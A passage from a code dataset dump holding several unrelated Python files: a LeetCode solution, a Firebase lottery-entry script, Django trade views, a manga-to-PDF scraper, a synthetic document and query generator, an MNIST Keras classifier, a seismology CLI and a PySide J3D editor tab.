\"10Б\" класса:')\nprint('\\n'.join(school.get_students('10Б')))\n\nstudent = school.find_student('Юрин Александр Александрович')\nprint('\\nУченик: {0}\\nУчебный класс: \"{1}\"\\n'\n 'Учителя: {2}\\nПредметы: {3}'.format(student['full_name'],\n student['class_room'],\n ', '.join(student['teachers']),\n ', '.join(student['lessons'])))\n\nprint('Родители: {0}, {1}'.format(student['parents']['mather'],\n student['parents']['father']))\n\nprint('\\nКласс: \"8А\"\\nПреподаватели: '\n '{0}'.format(', '.join(school.get_teachers('8А'))))\n","sub_path":"lesson6/Normal/les6-1_normal.py","file_name":"les6-1_normal.py","file_ext":"py","file_size_in_byte":8284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"254112053","text":"class Solution:\n\n def canIWin(self, maxChoosableInteger: int, desiredTotal: int) -> bool:\n if (1 + maxChoosableInteger) * maxChoosableInteger / 2 < desiredTotal:\n return False\n self.memo = {}\n return self.helper(list(range(1, maxChoosableInteger + 1)), desiredTotal)\n\n def helper(self, nums, desiredTotal):\n s = str(nums)\n if s in self.memo:\n return self.memo[s]\n\n if nums[-1] >= desiredTotal:\n return True\n\n for i in range(len(nums)):\n if not self.helper(list(nums[:i]) + list(nums[i + 1:]), desiredTotal - nums[i]):\n self.memo[s] = True\n return True\n\n self.memo[s] = False\n return False","sub_path":"2020.10.27_464_Can_I_win.py","file_name":"2020.10.27_464_Can_I_win.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"334353497","text":"# _*_ coding: utf-8 _*_\n# 程序 11-3 (Python 3 version)\n\nfrom firebase import firebase\ndb_url = 'https://python01.firebaseio.com'\nfdb = firebase.FirebaseApplication(db_url, None)\n\nwhile True:\n inv_lotto = dict()\n inv_month = input('请输入开奖月份(例:201511,输入-1结束):')\n if int(inv_month) == -1 :\n break\n inv_lotto['p1000w'] = input('请输入特别奖1000万的号码:')\n inv_lotto['p200w'] = input('请输入特奖200万的号码:')\n inv_lotto['p20w'] = list()\n while True:\n p20w = input('请输入头奖20万的号码(输入-1结束):')\n if int(p20w) == -1:\n break\n inv_lotto['p20w'].append(p20w)\n inv_lotto['p200'] = list()\n while True:\n p200 = input('请输入增开六奖的号码(输入-1结束):')\n if int(p200) == -1:\n break\n inv_lotto['p200'].append(p200)\n print(\"以下是您输入的内容:\")\n print(\"开奖月份:\", inv_month)\n print(\"1000万特别奖:\", inv_lotto['p1000w'])\n print(\"200万特奖:\", inv_lotto['p200w'])\n print(\"20万头奖:\", end=\"\")\n for n in inv_lotto['p20w']:\n print(n + \" \", end=\"\")\n print(\"\\n200元增开六奖:\", end=\"\")\n for n in inv_lotto['p200']:\n print(n + \" \", end=\"\")\n ans = input(\"\\n是否写入Firebase网络数据库?(y/n)\")\n if ans == 'y' or ans == 'Y':\n fdb.post('/invlotto/' + inv_month, inv_lotto)\n","sub_path":"编程/book_example/11-3.py","file_name":"11-3.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"616924205","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom django.db.models import Sum, Count, Avg\n\nfrom trade.models import Trade\nfrom cloth.models import Cloth\nfrom user.models import User\n\nfrom datetime import datetime, timedelta, timezone\nimport json\n\ndef get_trade_info(trade):\n trade_info = dict(id = trade.trade_id,\n cloth = str(trade.cloth),\n user = str(trade.user),\n cloth_number = trade.cloth_number,\n total_price = str(trade.total_price),\n color = str(trade.color),\n size = str(trade.size),\n time = trade.time.astimezone(timezone(timedelta(hours=8))).strftime(\"%Y-%m-%d %H:%M:%S\"), )\n return json.dumps(trade_info, ensure_ascii = False)\n\ndef trade(request):\n try:\n query_type = request.GET['type']\n if query_type == 'create':\n cloth_id = request.GET['cloth']\n user_id = request.GET['user']\n color = request.GET['color']\n size = request.GET['size']\n\n nowtime = datetime.now().strftime('%Y%m%d%H%M%S')\n trade_id = nowtime + cloth_id + user_id\n cloth = Cloth.objects.get(cloth_id = cloth_id)\n user = User.objects.get(user_id = user_id)\n \n cloth_number = int(request.GET['cloth_number'])\n total_price = request.GET['total_price']\n \n trade = Trade.objects.create(cloth = cloth,\n user = user,\n cloth_number = cloth_number,\n total_price = total_price,\n color = color,\n size = size,\n trade_id = trade_id)\n \n return HttpResponse(json.dumps(dict(trade_id = trade.id, request_info = \"CREATED!\"), ensure_ascii = False))\n \n elif query_type == 'query_id':\n trade_id = request.GET['id']\n trade = Trade.objects.get(trade_id = trade_id)\n \n return HttpResponse(get_trade_info(trade))\n \n elif query_type == 'query_sum_by_user':\n user_name = request.GET['user']\n user = User.objects.get(name = user_name)\n \n trade_info = Trade.objects.filter(user = user).values('user__name').annotate(count = Count('user'), sum_price = Sum('total_price'))\n tmp = list(trade_info)\n if tmp:\n trade_info = dict(user = tmp[0]['user__name'],\n count = tmp[0]['count'],\n sum_price = \"%.2f\" % float(tmp[0]['sum_price']))\n else:\n trade_info = dict(user = user_name, count = 0, sum_price = '0.00')\n \n return HttpResponse(json.dumps(trade_info, ensure_ascii = False))\n \n elif query_type == 'query_sum_by_cloth':\n cloth_name = request.GET['cloth']\n cloth = Cloth.objects.get(name = cloth_name)\n \n trade_info = Trade.objects.filter(cloth = cloth).values('cloth__name').annotate(count = Count('cloth'), sum_price = Sum('total_price'))\n tmp = list(trade_info)\n if tmp:\n trade_info = dict(cloth = tmp[0]['cloth__name'],\n count = tmp[0]['count'],\n sum_price = \"%.2f\" % float(tmp[0]['sum_price']))\n else:\n trade_info = dict(cloth = cloth_name, count = 0, sum_price = '0.00')\n \n return HttpResponse(json.dumps(trade_info, ensure_ascii = False))\n \n elif query_type == 'query_user_by_time':\n user_name = request.GET['user']\n user = User.objects.get(name = user_name)\n i = int(request.GET['i'])\n \n trade = Trade.objects.filter(user = user).order_by('-time')[i - 1]\n \n return HttpResponse(get_trade_info(trade))\n \n elif query_type == 'query_cloth_by_time':\n cloth_name = request.GET['cloth']\n cloth = Cloth.objects.get(name = cloth_name)\n i = int(request.GET['i'])\n \n trade = Trade.objects.filter(cloth = cloth).order_by('-time')[i - 1]\n \n return HttpResponse(get_trade_info(trade))\n \n else:\n return HttpResponse(json.dumps(dict(request_info = 'WRONG TYPE!'), ensure_ascii = False))\n \n except Exception as e:\n return HttpResponse(json.dumps(dict(request_info = str(e) + '\\n' + 'ERROR!'), ensure_ascii = False))\n\n","sub_path":"trade/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"507826007","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport requests\nimport os\nfrom PyPDF2 import PdfFileMerger, PdfFileReader\nfrom progress.bar import Bar\nfrom PIL import Image\nimport math\n\n# Global Variables\n###########################################################################\nprog_bar = None\nmanga_url = sys.argv[1]\nmanga_name = \"final\" # sys.argv[2] if sys.argv[2] is None else \"final\"\nbrowser = webdriver.PhantomJS(executable_path='./driver/phantomjs.exe')\n# webdriver.Chrome('chromedriver.exe')\npdf_index = 0\nsplitIndex = None\n\nfolder_path = {\n \"img\": \"./tmp/img\",\n \"pdf\": \"./tmp/pdf\",\n \"pdfs\": \"./tmp/pdfs\",\n \"output\": \"./output\"\n}\n###########################################################################\n\n'''\ndef __init__():\n # clearFolders()\n'''\n\n\ndef grouperList(l):\n return [l[i:i + splitIndex] for i in range(0, len(l), splitIndex)]\n\n\ndef getImagesFromChapter(chapter_url):\n global prog_bar\n browser.get(chapter_url)\n soup = BeautifulSoup(browser.page_source, 'html.parser')\n manga_images = soup.find_all('img', {'class': 'page-img'}, src=True)\n for i, image in enumerate(manga_images):\n name = f'{folder_path[\"img\"]}/{i:02}.jpeg'\n f = open(name, 'wb')\n f.write(requests.get(image.get('src')).content)\n f.close()\n convert2Pdf()\n delFilefromFolder(folder_path[\"img\"])\n prog_bar.next()\n\n\ndef convert2Pdf():\n global pdf_index\n pdf_file = Image.new('RGB', size=(100, 100), color=(255, 255, 255))\n pdf_name = f'{folder_path[\"pdf\"]}/{pdf_index:03}.pdf'\n imList = [Image.open(f'{folder_path[\"img\"]}/{i}').convert('RGB')\n for i in os.listdir(folder_path[\"img\"])]\n pdf_file.save(pdf_name, \"PDF\", resolution=100.0,\n save_all=True, append_images=imList)\n pdf_file.close()\n pdf_index += 1\n\n\ndef mergePDF():\n if splitIndex is None:\n merger = PdfFileMerger()\n for pdf in reversed([(f'{folder_path[\"pdf\"]}/{i}') for i in os.listdir(folder_path['pdf'])]):\n merger.append(PdfFileReader(open(pdf, 'rb')))\n merger.write(f\"{folder_path['output']}/{manga_name}.pdf\")\n merger.close()\n else:\n tmp_index = 0\n for pdf_subList in grouperList(list(reversed([(f'{folder_path[\"pdf\"]}/{i}') for i in os.listdir(folder_path['pdf'])]))):\n merger = PdfFileMerger()\n for pdf in pdf_subList:\n merger.append(PdfFileReader(open(pdf, 'rb')))\n merger.write(f\"{folder_path['pdfs']}/{tmp_index:02}.pdf\")\n merger.close()\n # delPDFfromList(pdf_subList)\n tmp_index += 1\n merger = PdfFileMerger()\n for tmp_pdf in [(f'{folder_path[\"pdfs\"]}/{i}') for i in os.listdir(folder_path['pdfs'])]:\n merger.append(PdfFileReader(open(tmp_pdf, 'rb')))\n merger.write(f\"{folder_path['output']}/{manga_name}.pdf\")\n merger.close()\n\n\ndef clearFolders():\n delFilefromFolder(folder_path[\"img\"])\n delFilefromFolder(folder_path[\"pdf\"])\n delFilefromFolder(folder_path[\"pdfs\"])\n\n\ndef delFilefromFolder(folder_name):\n for the_file in os.listdir(folder_name):\n file_path = os.path.join(folder_name, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n\ndef delPDFfromList(list_name):\n for the_file in os.listdir(folder_path['pdf']):\n file_path = os.path.join(folder_path['pdf'], the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n\ndef main():\n page = requests.get(manga_url)\n soup = BeautifulSoup(page.text, 'html.parser')\n chapters_url = soup.find_all(\"a\", {\"class\": \"chapt\"}, href=True)\n global prog_bar, splitIndex\n # split if chapers are > 50 else not split\n splitIndex = math.floor(\n len(chapters_url) / 4) if len(chapters_url) > 50 else None\n prog_bar = Bar('\\t\\tDownloading\\t\\t', max=len(chapters_url))\n for chapter in chapters_url:\n getImagesFromChapter(f'https://bato.to{chapter.get(\"href\")}')\n prog_bar.finish()\n print('Merging pdfs...')\n #prog_bar = Bar('\\t\\Merging\\t\\t', max=len(chapters_url))\n mergePDF()\n clearFolders()\n\n\nif __name__ == '__main__':\n clearFolders()\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"403339261","text":"###################################################\n#\n#\tAuthor: Yury Dzerin\n#\tDate: 07.10, 16.10\n#\n#\tDoc and Query Generator\n#\n#\t2013\n#\n###################################################\n\nimport sqlite3 as db\nimport sys\nimport math\nimport random\n\n\ng_wordsNum = 1000\nprecision = 1000000000\n\ndef computeRelevant(docID, cur):\n\n\tcur.execute(\"SELECT docSize, mu, sigma FROM Documents WHERE rowid=\\\"\" + str(docID)+ \"\\\"\")\n\tfor row in cur:\n\t\tdocSize = row[0]\n\t\tmu = row[1]\n\t\tsigma = row[2]\n\t\n\tqueryIDs = []\n\tcur.execute(\"SELECT rowid FROM QueryIDs\")\n\tfor row in cur:\n\t\tqueryIDs.append(row[0])\n\n\tfor queryID in queryIDs:\n\t\tquery = []\n\t\tcur.execute(\"SELECT wordID from Query WHERE queryID=\\\"\" + str(queryID) + \"\\\"\")\n\t\tfor row in cur:\n\t\t\tquery.append(row[0])\n\t\t\t\n\t\tprop = 0\n\t\tfor i in range(0, len(query)):\n\t\t\tprop += gaussianDist(float(mu), float(sigma), int(query[i]))\n\t\t\t\n\t\trelevant = 1 - pow(1 - prop, docSize)\n\t\n\t\tcur.execute(\"INSERT INTO Quires (queryID, docID, value) VALUES(\\\"\" + str(queryID) + \"\\\", \\\"\" + str(docID)+ \"\\\", \\\"\" + str(relevant) + \"\\\")\")\n\t\n\ndef gaussianDist(mu, sigma, x):\n\treturn math.exp(-(x - mu)*(x - mu)/(2*sigma*sigma))/(sigma * math.sqrt(2 * math.pi))\n\ndef erfinv(x):\n\treturn (math.sqrt(math.pi) * x)/2 + 1/24 * math.pow(math.pi, 1.5) * math.pow(x, 3) + 7/960 * math.pow(math.pi, 2.5) * math.pow(x, 5)\n\ndef randomWord(mu, sigma, yFrom, yTo):\n\ty = random.randrange(int(yFrom * precision), int(yTo * precision))/precision\n\twordID = math.sqrt(2) * sigma * erfinv(2 * y - 1) + mu\n\treturn int(wordID)\n\ndef addInvertedID(docID, wordID, cur):\n\n\tcur.execute(\"SELECT rowid from InvertedIndices WHERE docID =\\\"\" + str(docID) + \"\\\" AND wordID = \\\"\" + str(wordID) + \"\\\"\")\n\tinvertedID = 0\n\tfor row in cur:\n\t\tinvertedID = row[0]\n\tif invertedID == 0:\n\t\tcur.execute(\"INSERT INTO InvertedIndices (docID, wordID, quantity) VALUES(\\\"\" + str(docID) + \"\\\", \\\"\" + str(wordID) + \"\\\", \\\"1\\\")\")\n\t\tinvertedID = cur.lastrowid\n\telse:\t\n\t\tcur.execute(\"UPDATE InvertedIndices SET `quantity`=`quantity`+1 WHERE rowid=\\\"\" + str(invertedID) + \"\\\"\")\n\t\n\treturn invertedID\n\ndef genDocument(cur):\n\n\tmu = random.randrange(0, g_wordsNum)\n\tsigma = random.randrange(1, 10*precision)/precision\n\tdocSize = random.randrange(10, 100)\n\tcur.execute(\"INSERT INTO Documents (docName, docSize, mu, sigma)\\\n\t\tVALUES(\\\"\\\",\\\"\" + str(docSize)+ \"\\\",\\\"\" + str(mu)+ \"\\\", \\\"\" + str(sigma) + \"\\\" )\")\n\tdocID = cur.lastrowid\n\tyFrom = (1 + math.erf((0 - mu)/ (sigma * math.sqrt(2)))) / 2\n\tyTo = (1 + math.erf((g_wordsNum - mu)/ (sigma * math.sqrt(2)))) / 2\n\n\tfor i in range(1, docSize):\n\t\taddInvertedID(docID, randomWord(mu, sigma, yFrom, yTo), cur)\n\t\n\treturn docID\n\ndef genQuery(cur):\n\n\tcur.execute(\"INSERT INTO QueryIds (queryID) VALUES(1)\")\n\tqueryID = cur.lastrowid\n\t\n\tquery = []\n\tqueryLen = random.randrange(0, 4);\n\tfor i in range(0, queryLen):\n\t\tquery.append(random.randrange(0, g_wordsNum + 1) - 1)\n\t\tcur.execute(\"INSERT INTO Query (queryID, wordID) VALUES(\\\"\" + str(queryID) + \"\\\", \\\"\" + str(query[i]) + \"\\\")\")\n\n\tcur.execute(\"SELECT rowid, docSize, docName, mu, sigma FROM Documents\")\n\trel = {}\n\n\tfor row in cur:\n\t\tprop = 0\n\t\tfor i in range(0, queryLen):\n\t\t\tprop += gaussianDist(float(row[3]), float(row[4]), query[i])\n\t\trelevant = 1 - pow(1 - prop, row[1])\n\t\trel[row[0]] = relevant\n\n\tfor docID in rel.keys():\n\t\tcur.execute(\"INSERT INTO Quires (queryID, docID, value) VALUES(\\\"\" + str(queryID) + \"\\\", \\\"\" + str(docID)+ \"\\\", \\\"\" + str(rel[docID]) + \"\\\")\")\n\ndef generate(numOfDocs, numOfQueries, cur):\n\n\tfor i in range(0, numOfDocs):\n\t\tdocID = genDocument(cur)\n\t\tcomputeRelevant(docID, cur)\n\tfor i in range(0, numOfQueries):\n\t\tgenQuery(cur)\n\n","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"394135635","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom sklearn.decomposition import PCA\n\n# 加载数据\ndef load_data(): \n print(\"====>>===>>===>> LoadData\")\n trainData = pd.read_csv('data/train.csv')\n testData = pd.read_csv('data/test.csv')\n x_train = trainData.values[:, 1:]\n y_train = trainData.values[:, 0]\n x_test = testData.values[:, :]\n # 归一化\n x_train = x_train/255\n x_test = x_test/255\n return x_train, y_train, x_test\n pass \n\n# 降低数据维度\ndef data_pca(x_train, x_test, COMPONENT_NUM):\n print(\"====>>===>>===>> PCA \")\n pca = PCA(n_components=COMPONENT_NUM, copy=True, whiten=False) # 创建一个 PCA 对象\n pca.fit(x_train) # 构建 PCA 模型\n pcaXTrain = pca.transform(x_train)\n pcaXTest = pca.transform(x_test)\n\n return pcaXTrain, pcaXTest\n\n# 训练模型 \ndef create_model(x_train, y_train, x_test):\n print(\"====>>===>>===>> TrainModel \")\n # 定义模型的时候注意初始化输入形状,避免保存的模型有问题\n model = keras.Sequential()\n model.add(keras.layers.Dense(units=500, input_shape=(x_train.shape[1], ), activation='relu'))\n model.add(keras.layers.Dense(units=500, activation='relu'))\n model.add(keras.layers.Dense(units=10, activation='softmax'))\n\n model.compile(optimizer='adam', \n loss='sparse_categorical_crossentropy', \n metrics=['accuracy'])\n\n # epochs:表示一共训练的周期, batch_size:把多少层组合成一个训练单元,多线程加速\n history = model.fit(x_train, y_train, epochs=10, batch_size=32)\n model.summary()\n #保存模型\n model.save('model/model1.h5')\n return history\n\ndef saveResultData(x_test):\n model = keras.models.load_model('model/model1.h5')\n # 测试模型\n result = model.predict(x_test)\n print(result)\n\n lenth = len(result)\n test_label = np.zeros((lenth, 1))\n for i in range(lenth):\n test_label[i] = np.argmax(result[i])\n print(test_label)\n # 保存预测结果 , range(1, 28) 到不了 28 \n # 注意保存进入数据库中的格式以及数据的切片\n data = pd.DataFrame({'ImageId': range(1, lenth + 1), 'Label': test_label[:, 0]})\n data.to_csv('data/sample_submission.csv')\n \n\nx_train, y_train, x_test = load_data()\npcax_train, pcax_test = data_pca(x_train, x_test, 0.9)\ntry:\n saveResultData(pcax_test)\nexcept:\n history = create_model(pcax_train, y_train, pcax_test)\n saveResultData(pcax_test)\n\n'''\n# 单独预测某个值,要注意数组格式\nIn [4]: na = np.array([list(pcax_test[0])],)\nIn [5]: model = keras.models.load_model('model/model1.h5'')\n File \"\", line 1\n model = keras.models.load_model('model/model1.h5'') ^\nSyntaxError: EOL while scanning string literal\nIn [6]: model = keras.models.load_model('model/model1.h5')\nIn [7]: model.predict(na)\nOut[7]:\narray([[6.1574175e-15, 4.9995848e-17, 1.0000000e+00, 1.5179449e-17,\n 3.6376498e-19, 3.7012272e-26, 5.9435442e-17, 1.0842079e-13,\n 6.5080575e-19, 1.1886531e-23]], dtype=float32)\n'''\n ","sub_path":"digit_recognize.py","file_name":"digit_recognize.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"505539046","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 17 16:00:28 2021\n\n@author: Fu Yin (yinfu@mail.ustc.edu.cn) at USTC\n\nThis script:\n 1) The coding style refers to the beat (https://hvasbath.github.io/beat/);\n 2) main app function of MCMTpy;\n 3) include user manual and help guide;\n 4) include subcommands.\n\nModify history:\n 1) Mar 17 16:00:28 2021 || Fu Yin at USTC || The initial release.\n 2) ...\n \n\"\"\"\n\n\nimport sys\nfrom MCMTpy.info import version\nfrom MCMTpy import build_GFs\nfrom MCMTpy import syn\nfrom MCMTpy import sample\nfrom MCMTpy import plot\n\n\n\n#%%##########################################################################\n# -----------------------\n# 1. MCMTpy UESR MANUAL\n# -----------------------\n#############################################################################\n### 1.1. program_name\nprogram_name = 'MCMTpy'\n\n### 1.2. subcommand usages\nsubcommand_usages = {\n 'build_GFs': 'build_GFs [pyfk|sem] -c ',\n 'syn': 'syn [pyfk|sem] -c ',\n 'sample': 'sample [Grid|MH|HMC] -c ',\n 'plot': 'plot [pyfk|sem] -c ',\n}\nsubcommands = list(subcommand_usages.keys())\n\n### 1.3. user manual\nusage = program_name + ''' [options] ...-c \n\nVersion:'''+version+'''\nAuthor: Fu Yin\nEmail: yinfu@mail.ustc.edu.cn \n\n\nSubcommands:\n\n build_GFs % create GFs datebase\n syn % synthesize the waveform\n sample % sample the parameters\n plot % visualize the results\n\nTo further help:\n\n MCMTpy --help\n\n''' \n\n\n\n\n\n#%%##########################################################################\n# -------------------------\n# 2. Subcommands Function\n# -------------------------\n#############################################################################\n### 2.1. build_GFs function\ndef command_build_GFs(args):\n \n if args[0]=='--help':\n sys.exit('build_GFs usage: '+subcommand_usages['build_GFs']+'\\n'+\n 'for example: MCMTpy build_GFs [pyfk|sem] -c build_GFs.json ')\n \n else:\n if args[1]=='-c' and len(args)==3:\n method = args[0] # pyfk or sem\n filename = args[2] # file.json\n build_GFs(filename,method)\n else:\n sys.exit('MCMTpy: command error')\n\n\n\n### 2.2. syn function\ndef command_syn(args):\n \n if args[0]=='--help':\n sys.exit('syn usage: '+subcommand_usages['syn']+'\\n'+\n 'for example: MCMTpy syn [pyfk|sem] -c syn.json ')\n \n else:\n if args[1]=='-c' and len(args)==3:\n method = args[0] # pyfk or sem\n filename = args[2] # file.json\n syn(filename,method)\n else:\n sys.exit('MCMTpy: command error')\n\n\n\n### 2.3. sample function\ndef command_sample(args):\n \n if args[0]=='--help':\n sys.exit('sample usage: '+subcommand_usages['sample']+'\\n'+\n 'for example: MCMTpy sample [grid|MH|HMC] -c sample.json ')\n \n else:\n if args[1]=='-c' and len(args)==3:\n method = args[0] # pyfk or sem\n filename = args[2] # file.json\n sample(filename,method)\n else:\n sys.exit('MCMTpy: command error')\n\n\n\n### 2.4. plot function\ndef command_plot(args):\n \n if args[0]=='--help':\n sys.exit('syn usage: '+subcommand_usages['plot']+'\\n'+\n 'for example: MCMTpy plot [pyfk|sem] -c plot.json ')\n \n else:\n if args[1]=='-c' and len(args)==3:\n method = args[0] # pyfk or sem\n filename = args[2] # file.json\n plot(filename,method)\n else:\n sys.exit('MCMTpy: command error')\n\n\n\n\n\n#%%##########################################################################\n# ------------------\n# 3. Main Function\n# ------------------\n#############################################################################\n\ndef main():\n args = list(sys.argv) # funtion: get parameters from command line. For example: mpirun -n 4 MCMTpy build_GFs pyfk -c ./build_GFs.json, args will be = ['MCMTpy', 'build_GFs', 'pyfk', '-c', './build_GFs.json']\n\n if len(args) == 1: # when command line == MCMTpy\n sys.exit('Usage: %s' % usage)\n else:\n command = args[1]\n\n\n if (command in subcommands) and (args[-1] not in ('--help', '-h', 'help')): # execute subcommand\n globals()['command_' + command](args[2:])\n \n elif args[-1] in ('--help', '-h', 'help'): # execute help command\n if command in subcommands:\n globals()['command_' + command](['--help'])\n sys.exit('Usage: %s' % usage)\n \n else:\n sys.exit('MCMTpy: error: no such subcommand: %s' % command)\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n","sub_path":"MCMTpy/apps/MCMTpy.py","file_name":"MCMTpy.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"162781728","text":"\"\"\" HandleBar \"\"\"\n\nimport sys, os\n\nsys.stdout.flush()\nsys.stderr.flush()\nso = file('/tmp/handleBarOut.log', 'a+')\nse = file('/tmp/handleBarError.log', 'a+', 0)\nos.dup2(so.fileno(), sys.stdout.fileno())\nos.dup2(se.fileno(), sys.stderr.fileno())\n\nfrom app import *\nfrom lib import *\n\nreSub()","sub_path":"reSub.py","file_name":"reSub.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"259211614","text":"class publisher:\r\n def __init__(self,pname):\r\n self.pname=pname\r\n def display(self):\r\n print(\"name\",pname)\r\n \r\nclass book(publisher):\r\n def __init__(self,pname,bname,title):\r\n self.pname=pname\r\n self.bname=bname\r\n self.title=title\r\n def display(self):\r\n print(\"pname\",self.pname)\r\n print(\"bname\",self.bname)\r\n print(\"title\",self.title)\r\n\r\nclass python(book):\r\n def __init__(self,pname,bname,title,page,price):\r\n self.pname=pname\r\n self.bname=bname\r\n self.title=title\r\n self.page=page\r\n self.price=price\r\n def display(self):\r\n print(\"pname\",self.pname)\r\n print(\"bname\",self.bname)\r\n print(\"title\",self.pname)\r\n print(\"page\",self.page)\r\n print(\"price\",self.price)\r\n\r\nn=input(\"enter publisher\")\r\nb=input(\"enter book\")\r\nt=input(\"enter title\")\r\np=int(input(\"enter page\"))\r\npr=int(input(\"enter price\"))\r\nobj=python(n,b,t,p,pr)\r\nobj.display()\r\n \r\n","sub_path":"overriding.py","file_name":"overriding.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"344421413","text":"\nimport os\nfrom io import BytesIO\nimport traceback\nfrom PySide6.QtGui import *\nfrom PySide6.QtCore import *\nfrom PySide6.QtWidgets import *\nfrom gcft_paths import ASSETS_PATH\n\nfrom gclib import fs_helpers as fs\nfrom gclib.bunfoe import BUNFOE\nfrom gclib import gx_enums as GX\nfrom gclib.j3d import J3D\nfrom gclib.jchunk import JChunk\nfrom gclib.j3d_chunks.vtx1 import VertexFormat\nfrom gclib.j3d_chunks.jnt1 import Joint\nfrom gclib.j3d_chunks.shp1 import Shape\nfrom gclib.j3d_chunks.mat3 import Material\nfrom gclib.animation import AnimationKeyframe\nfrom gclib.j3d_chunks.mdl3 import MDLEntry, BPRegister, XFRegister\nfrom gclib.j3d_chunks.trk1 import ColorAnimation\nfrom gclib.j3d_chunks.ttk1 import UVAnimation\nfrom gclib.bti import BTI\n\nfrom gcft_ui.uic.ui_j3d_tab import Ui_J3DTab\nfrom gcft_ui.bunfoe_editor import BunfoeEditor, BunfoeWidget\n\nclass J3DTab(BunfoeEditor):\n def __init__(self):\n super().__init__()\n self.ui = Ui_J3DTab()\n self.ui.setupUi(self)\n \n self.j3d = None\n self.j3d_name = None\n self.model_loaded = False\n self.ui.j3d_chunks_tree.setColumnWidth(1, 200)\n self.ui.j3d_chunks_tree.setColumnWidth(2, 70)\n \n self.j3d_col_name_to_index = {}\n for col in range(self.ui.j3d_chunks_tree.columnCount()):\n column_name = self.ui.j3d_chunks_tree.headerItem().text(col)\n self.j3d_col_name_to_index[column_name] = col\n \n # TODO: save to settings file?\n self.chunk_type_is_expanded = {\n \"TEX1\": True,\n \"MAT3\": True,\n \"TRK1\": True,\n }\n \n self.isolated_visibility = False\n \n self.ui.export_j3d.setDisabled(True)\n self.ui.load_anim.setDisabled(True)\n \n self.ui.import_j3d.clicked.connect(self.import_j3d)\n self.ui.export_j3d.clicked.connect(self.export_j3d)\n \n self.ui.load_anim.clicked.connect(self.load_anim)\n \n self.ui.j3d_chunks_tree.itemSelectionChanged.connect(self.widget_item_selected)\n self.ui.j3d_chunks_tree.itemExpanded.connect(self.item_expanded)\n self.ui.j3d_chunks_tree.itemCollapsed.connect(self.item_collapsed)\n \n self.ui.j3d_chunks_tree.setContextMenuPolicy(Qt.CustomContextMenu)\n self.ui.j3d_chunks_tree.customContextMenuRequested.connect(self.show_j3d_chunks_tree_context_menu)\n self.ui.actionOpenJ3DImage.triggered.connect(self.open_image_in_j3d)\n self.ui.actionReplaceJ3DImage.triggered.connect(self.replace_image_in_j3d)\n \n self.ui.j3d_viewer.error_showing_preview.connect(self.display_j3d_preview_error)\n self.ui.j3d_viewer.hide()\n self.ui.j3dultra_error_area.hide()\n \n self.field_value_changed.connect(self.update_j3d_preview)\n self.ui.update_j3d_preview.clicked.connect(self.update_j3d_preview)\n self.ui.update_j3d_preview.setIcon(self.style().standardIcon(QStyle.SP_BrowserReload))\n self.ui.toggle_visibility.clicked.connect(self.toggle_isolated_visibility)\n self.icon_visible_all = QIcon(os.path.join(ASSETS_PATH, \"visible_all.png\"))\n self.icon_visible_isolated = QIcon(os.path.join(ASSETS_PATH, \"visible_isolated.png\"))\n self.ui.toggle_visibility.setIcon(self.icon_visible_all)\n # This is just the max size, doesn't need to be exact.\n self.ui.toggle_visibility.setIconSize(QSize(32, 8))\n \n # Make the splitter start out evenly split between all three widgets.\n # TODO: the J3D preview column should be collapsed whenever the preview is not visible\n self.ui.splitter.setSizes([2**30, 2**30, 2**30])\n \n # self.ui.anim_pause_button.setIcon(self.style().standardIcon(QStyle.SP_MediaPause))\n self.ui.anim_pause_button.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n self.ui.anim_slider.valueChanged.connect(self.update_anim_frame)\n \n def import_j3d(self):\n filters = [\n \"All J3D files (*.bmd *.bdl *.bmt *.bls *.btk *.bck *.brk *.bpk *.btp *.bca *.bva *.bla)\",\n \"Models and material tables (*.bmd *.bdl *.bmt)\",\n ]\n \n self.window().generic_do_gui_file_operation(\n op_callback=self.import_j3d_by_path,\n is_opening=True, is_saving=False, is_folder=False,\n file_type=\"J3D file\", file_filter=\";;\".join(filters)\n )\n \n def export_j3d(self):\n filters = []\n current_filter = self.get_file_filter_by_current_j3d_file_type()\n if current_filter is not None:\n filters.append(current_filter)\n filters.append(\"All J3D files (*.bmd *.bdl *.bmt *.bls *.btk *.bck *.brk *.bpk *.btp *.bca *.bva *.bla)\")\n \n j3d_name = \"%s.%s\" % (self.j3d_name, self.j3d.file_type[:3])\n self.window().generic_do_gui_file_operation(\n op_callback=self.export_j3d_by_path,\n is_opening=False, is_saving=True, 